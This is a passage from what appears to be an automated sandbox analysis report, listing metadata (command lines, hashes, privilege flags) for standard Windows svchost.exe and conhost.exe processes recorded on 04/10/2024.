                            Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                            Imagebase:0x7ff6eef20000
                            File size:55'320 bytes
                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                            Has elevated privileges:true
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Has exited:false

                            Target ID:55
                            Start time:03:43:23
                            Start date:04/10/2024
                            Path:C:\Windows\System32\svchost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                            Imagebase:0x7ff6eef20000
                            File size:55'320 bytes
                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                            Has elevated privileges:true
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Has exited:false

                            Target ID:56
                            Start time:03:43:24
                            Start date:04/10/2024
                            Path:C:\Windows\System32\svchost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                            Imagebase:0x7ff6eef20000
                            File size:55'320 bytes
                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:false

                            Target ID:57
                            Start time:03:43:25
                            Start date:04/10/2024
                            Path:C:\Windows\System32\svchost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                            Imagebase:0x7ff6eef20000
                            File size:55'320 bytes
                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:false

                            Target ID:58
                            Start time:03:43:25
                            Start date:04/10/2024
                            Path:C:\Windows\System32\svchost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache
                            Imagebase:0x7ff6eef20000
                            File size:55'320 bytes
                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                            Has elevated privileges:true
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Has exited:false

                            Target ID:653
                            Start time:03:43:37
                            Start date:04/10/2024
                            Path:C:\Windows\System32\Conhost.exe
                            Wow64 process (32bit):
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:
                            Has administrator privileges:
                            Programmed in:C, C++ or other language
                            Has exited:false

                            Target ID:671
                            Start time:03:43:45
                            Start date:04/10/2024
                            Path:C:\Windows\System32\Conhost.exe
                            Wow64 process (32bit):
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:
                            Has administrator privileges:
                            Programmed in:C, C++ or other language
                            Has exited:false

                            No disassembly